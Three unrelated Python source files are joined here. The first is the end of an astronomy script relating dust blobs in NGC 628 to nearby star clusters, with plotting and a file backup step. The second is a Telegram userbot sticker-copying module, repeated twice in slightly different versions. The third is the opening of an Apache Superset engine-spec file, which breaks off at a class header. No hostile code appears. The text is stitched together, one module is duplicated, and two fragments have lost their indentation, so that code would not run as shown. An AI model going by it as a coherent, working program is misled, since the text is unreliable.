for i in range(len(ra)):
f.write('point(%1.6f,%1.6f) # point=X\n'%(ra[i], dec[i]))
f.close()
# write out new cluster catalog file with just classes 1,2,3
np.savetxt('ngc628-c_clusters_class123.cat', all_clusters, delimiter='\t')
if closest_clusters:
print('\nfinding the closest stellar clusters to the dust blobs \n')
os.chdir(main_dir + 'science')
dustcoords, starcoords, age, mass, excess = nearest_cluster('extract/band4.overlap.deg.reg')
# calculate angular separations
ang_sep = np.array([ dustcoords[i].separation(starcoords[i]).arcsec for i in range(len(dustcoords))])
# calculate physical separations in pc
phys_sep = np.array([ ang*10e6 / 206265 for ang in ang_sep ])
age_avg = np.array([ np.mean(a) for a in age ])
mass_avg = np.array([ np.mean(m) for m in mass ])
excess_avg = np.array([ np.mean(e) for e in excess])
phys_sep_avg = np.array([ np.mean(p) for p in phys_sep ])
ang_sep_avg = np.array([ np.mean(a) for a in ang_sep])
age_min = np.array([ np.min(a) for a in age ])
mass_min = np.array([ np.min(m) for m in mass ])
excess_min = np.array([ np.min(e) for e in excess ])
phys_sep_min = np.array([ np.min(p) for p in phys_sep])
ang_sep_min = np.array([ np.min(a) for a in ang_sep])
np.savetxt('closest_clusters_props.average.dat', np.transpose([ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
np.savetxt('closest_clusters_props.minimum.dat', np.transpose([ang_sep_min, phys_sep_min, age_min, mass_min, excess_min]), header='ang sep (arsec) \t physical sep (pc) \t age (yr) \t mass (solar mass) \t E(B-V)')
if plot:
print('\ndoing some plotting bidness \n')
ang_sep_avg, phys_sep_avg, age_avg, mass_avg, excess_avg = np.loadtxt('closest_clusters_props.average.dat', unpack=True)
ang_sep_min, phys_sep_min, age_min, mass_min, excess_min = np.loadtxt('closest_clusters_props.minimum.dat', unpack=True)
slopes = np.loadtxt('slopes+errs.dat', usecols=[0])
plt.figure()
plt.semilogx(age_avg, slopes, 'ro')
# plt.loglog(age_avg, np.abs(slopes), 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_avg.png')
# plt.show()
plt.figure()
plt.semilogx(age_min, slopes, 'ro')
plt.xlabel('Age (years)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/age_min.png')
# plt.show()
plt.figure()
plt.semilogx(mass_avg, slopes, 'ro')
# plt.loglog(mass_avg, -slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/mass_avg.png')
# plt.show()
plt.figure()
plt.semilogx(mass_min, slopes, 'ro')
plt.xlabel('Mass (solar masses)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/mass_min.png')
# plt.show()
plt.figure()
plt.semilogx(excess_avg, slopes, 'ro')
# plt.loglog(excess_avg, -slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('3 closest clusters averaged')
plt.savefig('figs/excess_avg.png')
# plt.show()
plt.figure()
plt.semilogx(excess_min, slopes, 'ro')
plt.xlabel('E(B-V)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/excess_min.png')
# plt.show()
plt.figure()
plt.semilogy(phys_sep_avg, age_avg, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('3 closest clusters averaged')
plt.savefig('figs/age_sep_avg.png')
plt.figure()
plt.semilogy(phys_sep_min, age_min, 'bo')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Age (yr)')
plt.title('closest cluster')
plt.savefig('figs/age_sep_min.png')
plt.figure()
plt.semilogx(phys_sep_min, slopes, 'ro')
plt.xlabel('Physical Separation (pc)')
plt.ylabel('Dust Continuum Slope')
plt.title('closest cluster')
plt.savefig('figs/slope_vs_sep.png')
if backup:
os.chdir(main_dir + 'science')
# save relevant files in new directory
extract_files = 'cp extract/band4.cat extract/band4.in_footprint.cat extract/band4.in_footprint.deg.reg extract/band4.overlap.cat extract/band4.overlap.deg.reg extract/band7.cat extract/band7.in_footprint.cat extract/band7.in_footprint.deg.reg extract/band7.overlap.cat extract/band7.overlap.deg.reg '+backup_dir
herschel_files = 'cp herschel/bb_params.dat herschel/herschel_flux.dat herschel/radiation.dat herschel/sky.sigma.temp.dat '+backup_dir # also tables.asc renamed to tables.herschel.asc
global_files = 'cp global/alma_global_flux.dat '+backup_dir # also tables.asc renamed to tables.alma.asc
files = 'cp slopes+errs.dat all_clusters.dat closest_clusters_props.average.dat closest_clusters_props.minimum.dat source_fluxes.dat '+backup_dir #also figs directory copied
try:
subprocess.call(['mkdir', '-p', backup_dir])
except:
print('failed to make backup directory')
try:
subprocess.call(extract_files.split())
except:
print('failed to copy extract directory files')
try:
subprocess.call(herschel_files.split())
except:
print('failed to copy herschel directory files')
try:
subprocess.call(['cp', 'herschel/tables.asc', backup_dir+'/tables.herschel.asc'])
except:
print('failed to copy herschel tables')
try:
subprocess.call(global_files.split())
except:
print('failed to copy global flux files')
try:
subprocess.call(['cp', 'global/tables.4.asc', backup_dir+'/tables.alma.asc'])
except:
print('failed to global tables')
try:
subprocess.call(files.split())
except:
print('failed to copy main directory files')
try:
subprocess.call(['cp', '-r', 'figs', backup_dir+'/'])
except:
print('failed to copy the figs directory')
|
# Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Random progress messages; one is picked at random and flashed to the user
# while `.kang` downloads/uploads the sticker.
KANGING_STR = [
    "Using Witchery to kang this sticker...",
    "Plagiarising hehe...",
    "Inviting this sticker over to my pack...",
    "Kanging this sticker...",
    "Hey that's a nice sticker!\nMind if I kang?!..",
    "hehe me stel ur stikér\nhehe.",
    "Ay look over there (☉。☉)!→\nWhile I kang this...",
    "Roses are red violets are blue, kanging this sticker so my pacc looks cool",
    "Imprisoning this sticker...",
    "Mr.Steal Your Sticker is stealing this sticker... ",
]
@register(outgoing=True, pattern="^.kang")
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones.

    Usage: reply `.kang [emoji('s)] [pack#]` to a photo, image file, static
    sticker or animated (.tgs) sticker.  The sticker is added to the user's
    pack by driving a scripted conversation with the official @Stickers bot.
    """
    user = await bot.get_me()
    if not user.username:
        # Account has no @username; fall back to the first name for pack names.
        user.username = user.first_name
    message = await args.get_reply_message()
    photo = None
    emojibypass = False  # True when the emoji was taken from the source sticker
    is_anim = False
    emoji = None
    # --- Step 1: download the replied-to media ---
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Static sticker: reuse the emoji already attached to it.
                emoji = message.media.document.attributes[1].alt
                emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
            emojibypass = True
            is_anim = True
            photo = 1  # sentinel: media was saved to disk, not kept in `photo`
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    # --- Step 2: parse optional "[emoji] [pack#]" command arguments ---
    if photo:
        splat = args.text.split()
        if not emojibypass:
            emoji = "🤔"
        pack = 1
        if len(splat) == 3:
            pack = splat[2]  # User sent both
            emoji = splat[1]
        elif len(splat) == 2:
            if splat[1].isnumeric():
                # User wants to push into different pack, but is okay with
                # thonk as emote.
                pack = int(splat[1])
            else:
                # User sent just custom emote, wants to push to default
                # pack
                emoji = splat[1]
        packname = f"Uni_Borg_{user.id}"
        packnick = f"Param's Pack"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            # Static stickers must be PNG and fit the 512x512 canvas.
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # --- Step 3: probe the pack's t.me page; an existing pack's page does
        # not carry the "user has created the Sticker Set" notice ---
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append the sticker to it via @Stickers.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                # "120" in the reply presumably signals the 120-sticker pack
                # limit — roll over to the next volume. TODO confirm wording.
                while "120" in x.text:
                    pack += 1
                    packname = f"a{user.id}_by_{user.username}_{pack}"
                    packnick = f"@{user.username}'s kang pack Vol.{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # Volume doesn't exist yet: create it from scratch.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
                            await conv.send_file(file, force_document=True)
                        await conv.get_response()
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"`Sticker added in a Different Pack !\
                            \nThis Pack is Newly created!\
                            \nYour pack can be found [here](t.me/addstickers/{packname})",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack doesn't exist yet: create it and upload the first sticker.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        await args.edit(f"`Sticker kanged successfully!`\
            \nPack can be found [here](t.me/addstickers/{packname})",
                        parse_mode='md')
async def resize_photo(photo):
    """ Resize the given photo to fit the 512x512 Telegram sticker canvas.

    :param photo: path or file-like object accepted by ``PIL.Image.open``
    :return: the resized PIL image, aspect ratio preserved, with its larger
        side equal to 512 (smaller images are scaled up, larger ones down)
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    # Bug fix: the original condition was `(image.width and image.height) < 512`,
    # which — because `and` returns its last truthy operand — only compared the
    # *height*, sending wide-but-short images down the wrong branch.
    if image.width < 512 and image.height < 512:
        # Image is smaller than the canvas on both sides: scale it up so the
        # larger side becomes exactly 512.
        scale = 512 / max(image.width, image.height)
        new_size = (math.floor(image.width * scale),
                    math.floor(image.height * scale))
        image = image.resize(new_size)
    else:
        # At least one side is already >= 512: shrink in place.
        image.thumbnail(maxsize)
    return image
@register(outgoing=True, pattern="^.stkrinfo$")
async def get_pack_info(event):
    """ For .stkrinfo: reply to a sticker to fetch details about its pack. """
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    rep_msg = await event.get_reply_message()
    if not rep_msg.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        # Stickers carry the sticker-set reference as the second document
        # attribute; plain documents don't have it (IndexError → not a sticker).
        stickerset_attr = rep_msg.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(stickerset_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    get_stickerset = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=stickerset_attr.stickerset.id,
                access_hash=stickerset_attr.stickerset.access_hash)))
    # Collect the distinct emojis used in the pack, preserving pack order.
    pack_emojis = []
    for document_sticker in get_stickerset.packs:
        if document_sticker.emoticon not in pack_emojis:
            pack_emojis.append(document_sticker.emoticon)
    # Bug fix: the last line previously nested double quotes inside a
    # double-quoted f-string ({" ".join(...)}), which is a SyntaxError on
    # every Python before 3.12 (PEP 701); use single quotes instead.
    OUTPUT = f"**Sticker Title:** `{get_stickerset.set.title}\n`" \
             f"**Sticker Short Name:** `{get_stickerset.set.short_name}`\n" \
             f"**Official:** `{get_stickerset.set.official}`\n" \
             f"**Archived:** `{get_stickerset.set.archived}`\n" \
             f"**Stickers In Pack:** `{len(get_stickerset.packs)}`\n" \
             f"**Emojis In Pack:**\n{' '.join(pack_emojis)}"
    await event.edit(OUTPUT)
# Register this module's help text so `.help stickers` can display it.
CMD_HELP.update({
    "stickers":
    ".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
| # Copyright (C) 2019 The Raphielscape Company LLC.
#
# Licensed under the Raphielscape Public License, Version 1.c (the "License");
# you may not use this file except in compliance with the License.
#
""" Userbot module for kanging stickers or making new ones. Thanks @rupansh"""
import io
import math
import urllib.request
from os import remove
from PIL import Image
import random
from telethon.tl.types import DocumentAttributeFilename, MessageMediaPhoto
from userbot import bot, CMD_HELP
from userbot.events import register
from telethon.tl.functions.messages import GetStickerSetRequest
from telethon.tl.types import InputStickerSetID
from telethon.tl.types import DocumentAttributeSticker
# Random progress messages; one is picked at random and flashed to the user
# while `.kang` downloads/uploads the sticker.
KANGING_STR = [
    "Using Witchery to kang this sticker...",
    "Plagiarising hehe...",
    "Inviting this sticker over to my pack...",
    "Kanging this sticker...",
    "Hey that's a nice sticker!\nMind if I kang?!..",
    "hehe me stel ur stikér\nhehe.",
    "Ay look over there (☉。☉)!→\nWhile I kang this...",
    "Roses are red violets are blue, kanging this sticker so my pacc looks cool",
    "Imprisoning this sticker...",
    "Mr.Steal Your Sticker is stealing this sticker... ",
]
@register(outgoing=True, pattern="^.kang")
async def kang(args):
    """ For .kang command, kangs stickers or creates new ones.

    Usage: reply `.kang [emoji('s)] [pack#]` to a photo, image file, static
    sticker or animated (.tgs) sticker.  The sticker is added to the user's
    pack by driving a scripted conversation with the official @Stickers bot.
    """
    user = await bot.get_me()
    if not user.username:
        # Account has no @username; fall back to the first name for pack names.
        user.username = user.first_name
    message = await args.get_reply_message()
    photo = None
    emojibypass = False  # True when the emoji was taken from the source sticker
    is_anim = False
    emoji = None
    # --- Step 1: download the replied-to media ---
    if message and message.media:
        if isinstance(message.media, MessageMediaPhoto):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            photo = await bot.download_media(message.photo, photo)
        elif "image" in message.media.document.mime_type.split('/'):
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            photo = io.BytesIO()
            await bot.download_file(message.media.document, photo)
            if (DocumentAttributeFilename(file_name='sticker.webp') in
                    message.media.document.attributes):
                # Static sticker: reuse the emoji already attached to it.
                emoji = message.media.document.attributes[1].alt
                emojibypass = True
        elif "tgsticker" in message.media.document.mime_type:
            await args.edit(f"`{random.choice(KANGING_STR)}`")
            await bot.download_file(message.media.document,
                                    'AnimatedSticker.tgs')
            attributes = message.media.document.attributes
            for attribute in attributes:
                if isinstance(attribute, DocumentAttributeSticker):
                    emoji = attribute.alt
            emojibypass = True
            is_anim = True
            photo = 1  # sentinel: media was saved to disk, not kept in `photo`
        else:
            await args.edit("`Unsupported File!`")
            return
    else:
        await args.edit("`I can't kang that...`")
        return
    # --- Step 2: parse optional "[emoji] [pack#]" command arguments ---
    if photo:
        splat = args.text.split()
        if not emojibypass:
            emoji = "🤔"
        pack = 1
        if len(splat) == 3:
            pack = splat[2]  # User sent both
            emoji = splat[1]
        elif len(splat) == 2:
            if splat[1].isnumeric():
                # User wants to push into different pack, but is okay with
                # thonk as emote.
                pack = int(splat[1])
            else:
                # User sent just custom emote, wants to push to default
                # pack
                emoji = splat[1]
        packname = f"Uni_Borg_{user.id}"
        packnick = f"Param's Pack"
        cmd = '/newpack'
        file = io.BytesIO()
        if not is_anim:
            # Static stickers must be PNG and fit the 512x512 canvas.
            image = await resize_photo(photo)
            file.name = "sticker.png"
            image.save(file, "PNG")
        else:
            packname += "_anim"
            packnick += " (Animated)"
            cmd = '/newanimated'
        # --- Step 3: probe the pack's t.me page; an existing pack's page does
        # not carry the "user has created the Sticker Set" notice ---
        response = urllib.request.urlopen(
            urllib.request.Request(f'http://t.me/addstickers/{packname}'))
        htmlstr = response.read().decode("utf8").split('\n')
        if " A <strong>Telegram</strong> user has created the <strong>Sticker Set</strong>." not in htmlstr:
            # Pack already exists: append the sticker to it via @Stickers.
            async with bot.conversation('Stickers') as conv:
                await conv.send_message('/addsticker')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packname)
                x = await conv.get_response()
                # "120" in the reply presumably signals the 120-sticker pack
                # limit — roll over to the next volume. TODO confirm wording.
                while "120" in x.text:
                    pack += 1
                    packname = f"a{user.id}_by_{user.username}_{pack}"
                    packnick = f"@{user.username}'s kang pack Vol.{pack}"
                    await args.edit("`Switching to Pack " + str(pack) +
                                    " due to insufficient space`")
                    await conv.send_message(packname)
                    x = await conv.get_response()
                    if x.text == "Invalid pack selected.":
                        # Volume doesn't exist yet: create it from scratch.
                        await conv.send_message(cmd)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message(packnick)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        if is_anim:
                            await conv.send_file('AnimatedSticker.tgs')
                            remove('AnimatedSticker.tgs')
                        else:
                            file.seek(0)
                            await conv.send_file(file, force_document=True)
                        await conv.get_response()
                        await conv.send_message(emoji)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message("/publish")
                        if is_anim:
                            await conv.get_response()
                            await conv.send_message(f"<{packnick}>")
                        # Ensure user doesn't get spamming notifications
                        await conv.get_response()
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.send_message("/skip")
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        await conv.send_message(packname)
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await conv.get_response()
                        # Ensure user doesn't get spamming notifications
                        await bot.send_read_acknowledge(conv.chat_id)
                        await args.edit(f"`Sticker added in a Different Pack !\
                            \nThis Pack is Newly created!\
                            \nYour pack can be found [here](t.me/addstickers/{packname})",
                                        parse_mode='md')
                        return
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message('/done')
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        else:
            # Pack doesn't exist yet: create it and upload the first sticker.
            await args.edit("`Brewing a new Pack...`")
            async with bot.conversation('Stickers') as conv:
                await conv.send_message(cmd)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message(packnick)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                if is_anim:
                    await conv.send_file('AnimatedSticker.tgs')
                    remove('AnimatedSticker.tgs')
                else:
                    file.seek(0)
                    await conv.send_file(file, force_document=True)
                rsp = await conv.get_response()
                if "Sorry, the file type is invalid." in rsp.text:
                    await args.edit(
                        "`Failed to add sticker, use` @Stickers `bot to add the sticker manually.`"
                    )
                    return
                await conv.send_message(emoji)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message("/publish")
                if is_anim:
                    await conv.get_response()
                    await conv.send_message(f"<{packnick}>")
                # Ensure user doesn't get spamming notifications
                await conv.get_response()
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.send_message("/skip")
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                await conv.send_message(packname)
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
                await conv.get_response()
                # Ensure user doesn't get spamming notifications
                await bot.send_read_acknowledge(conv.chat_id)
        await args.edit(f"`Sticker kanged successfully!`\
            \nPack can be found [here](t.me/addstickers/{packname})",
                        parse_mode='md')
async def resize_photo(photo):
    """ Resize the given photo to fit the 512x512 Telegram sticker canvas.

    :param photo: path or file-like object accepted by ``PIL.Image.open``
    :return: the resized PIL image, aspect ratio preserved, with its larger
        side equal to 512 (smaller images are scaled up, larger ones down)
    """
    image = Image.open(photo)
    maxsize = (512, 512)
    # Bug fix: the original condition was `(image.width and image.height) < 512`,
    # which — because `and` returns its last truthy operand — only compared the
    # *height*, sending wide-but-short images down the wrong branch.
    if image.width < 512 and image.height < 512:
        # Image is smaller than the canvas on both sides: scale it up so the
        # larger side becomes exactly 512.
        scale = 512 / max(image.width, image.height)
        new_size = (math.floor(image.width * scale),
                    math.floor(image.height * scale))
        image = image.resize(new_size)
    else:
        # At least one side is already >= 512: shrink in place.
        image.thumbnail(maxsize)
    return image
@register(outgoing=True, pattern="^.stkrinfo$")
async def get_pack_info(event):
    """ For .stkrinfo: reply to a sticker and show details of its pack. """
    # Guard: the command only makes sense as a reply to a sticker message.
    if not event.is_reply:
        await event.edit("`I can't fetch info from nothing, can I ?!`")
        return
    replied = await event.get_reply_message()
    if not replied.document:
        await event.edit("`Reply to a sticker to get the pack details`")
        return
    try:
        # Stickers carry the sticker-set reference as the second attribute;
        # a plain document raises IndexError here.
        sticker_attr = replied.document.attributes[1]
        await event.edit(
            "`Fetching details of the sticker pack, please wait..`")
    except BaseException:
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    if not isinstance(sticker_attr, DocumentAttributeSticker):
        await event.edit("`This is not a sticker. Reply to a sticker.`")
        return
    sticker_set = await bot(
        GetStickerSetRequest(
            InputStickerSetID(
                id=sticker_attr.stickerset.id,
                access_hash=sticker_attr.stickerset.access_hash)))
    # Collect the distinct emojis used in the pack, preserving pack order.
    seen_emojis = []
    for pack_entry in sticker_set.packs:
        if pack_entry.emoticon not in seen_emojis:
            seen_emojis.append(pack_entry.emoticon)
    details = (
        f"**Sticker Title:** `{sticker_set.set.title}\n`"
        f"**Sticker Short Name:** `{sticker_set.set.short_name}`\n"
        f"**Official:** `{sticker_set.set.official}`\n"
        f"**Archived:** `{sticker_set.set.archived}`\n"
        f"**Stickers In Pack:** `{len(sticker_set.packs)}`\n"
        f"**Emojis In Pack:**\n{' '.join(seen_emojis)}"
    )
    await event.edit(details)
# Register this module's help text so `.help stickers` can display it.
CMD_HELP.update({
    "stickers":
    ".kang\
\nUsage: Reply .kang to a sticker or an image to kang it to your userbot pack.\
\n\n.kang [emoji('s)]\
\nUsage: Works just like .kang but uses the emoji('s) you picked.\
\n\n.kang [number]\
\nUsage: Kang's the sticker/image to the specified pack but uses 🤔 as emoji.\
\n\n.kang [emoji('s)] [number]\
\nUsage: Kang's the sticker/image to the specified pack and uses the emoji('s) you picked.\
\n\n.stkrinfo\
\nUsage: Gets info about the sticker pack."
})
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=too-many-lines
import json
import logging
import re
from contextlib import closing
from datetime import datetime
from typing import (
Any,
Callable,
Dict,
List,
Match,
NamedTuple,
Optional,
Pattern,
Set,
Tuple,
Type,
TYPE_CHECKING,
Union,
)
import pandas as pd
import sqlparse
from apispec import APISpec
from apispec.ext.marshmallow import MarshmallowPlugin
from flask import current_app, g
from flask_babel import gettext as __, lazy_gettext as _
from marshmallow import fields, Schema
from marshmallow.validate import Range
from sqlalchemy import column, select, types
from sqlalchemy.engine.base import Engine
from sqlalchemy.engine.interfaces import Compiled, Dialect
from sqlalchemy.engine.reflection import Inspector
from sqlalchemy.engine.url import make_url, URL
from sqlalchemy.ext.compiler import compiles
from sqlalchemy.orm import Session
from sqlalchemy.sql import quoted_name, text
from sqlalchemy.sql.expression import ColumnClause, Select, TextAsFrom, TextClause
from sqlalchemy.types import TypeEngine
from typing_extensions import TypedDict
from superset import security_manager, sql_parse
from superset.errors import ErrorLevel, SupersetError, SupersetErrorType
from superset.models.sql_lab import Query
from superset.models.sql_types.base import literal_dttm_type_factory
from superset.sql_parse import ParsedQuery, Table
from superset.utils import core as utils
from superset.utils.core import ColumnSpec, GenericDataType
from superset.utils.hashing import md5_sha_from_str
from superset.utils.network import is_hostname_valid, is_port_open
if TYPE_CHECKING:
# prevent circular imports
from superset.connectors.sqla.models import TableColumn
from superset.models.core import Database
# Shape of one entry in `column_type_mappings`: a regex matched against the
# raw column type name, the SQLAlchemy type (or a factory taking the regex
# match) to map it to, and the generic Superset data type.
ColumnTypeMapping = Tuple[
    Pattern[str],
    Union[TypeEngine, Callable[[Match[str]], TypeEngine]],
    GenericDataType,
]
# NOTE(review): this grabs the *root* logger rather than the usual
# `logging.getLogger(__name__)` — presumably intentional; confirm before
# changing, as handlers attached here affect the whole process.
logger = logging.getLogger()
class TimeGrain(NamedTuple):
